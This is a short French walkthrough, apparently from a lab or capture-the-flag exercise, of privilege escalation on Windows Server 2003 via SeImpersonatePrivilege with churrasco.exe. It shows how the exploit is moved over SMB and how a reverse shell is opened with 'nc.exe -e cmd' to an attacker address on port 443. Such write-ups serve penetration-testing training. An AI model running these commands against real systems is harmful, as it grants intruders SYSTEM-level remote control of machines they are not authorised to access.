# Windows Server 2003 (Kernel Exploitation)
### Explotation du Kernel - Windows Server 2003
À l'aide de la commande `systeminfo`, nous constatons que l'équipement est très ancien (Windows Server 2003) :
```bash
systeminfo
```
Nous avons également le privilège `SeImpersonatePrivilege`, ce qui nous permet de tenter une élévation de privilèges.
Pour contourner cette limitation, nous allons utiliser l'outil **churrasco.exe**.
{% embed url="" %}
**Transfert de fichier Windows (SMB)**
> Nous utilisons **smbserver.py** pour partager un répertoire contenant le fichier exploit 40627.exe Ce fichier est ensuite copié sur la machine cible.
```bash
smbserver.py share $(pwd) -smb2support
```
Depuis la machine cible, nous copions le fichier malveillant à l'aide de la commande SMB :
```bash
copy \\10.10.14.30\share\churrasco.exe churrasco.exe
```
Nous pouvons alors exécuter n'importe quelle commande avec ce binaire, par exemple :
```powershell
.\churrasco.exe "whoami"
```
**Établir une reverse shell**
Pour établir une reverse shell, nous écoutons sur le port 443 :
```bash
sudo rlwrap nc -nvlp 443
```
Nous créons à nouveau un serveur SMB avec **nc.exe** :
```bash
smbserver.py share $(pwd) -smb2support
```
Enfin, nous exécutons la reverse shell avec la commande suivante :
```bash
.\churrasco.exe "\\10.10.14.30\share\nc.exe -e cmd 10.10.14.30 443"
```
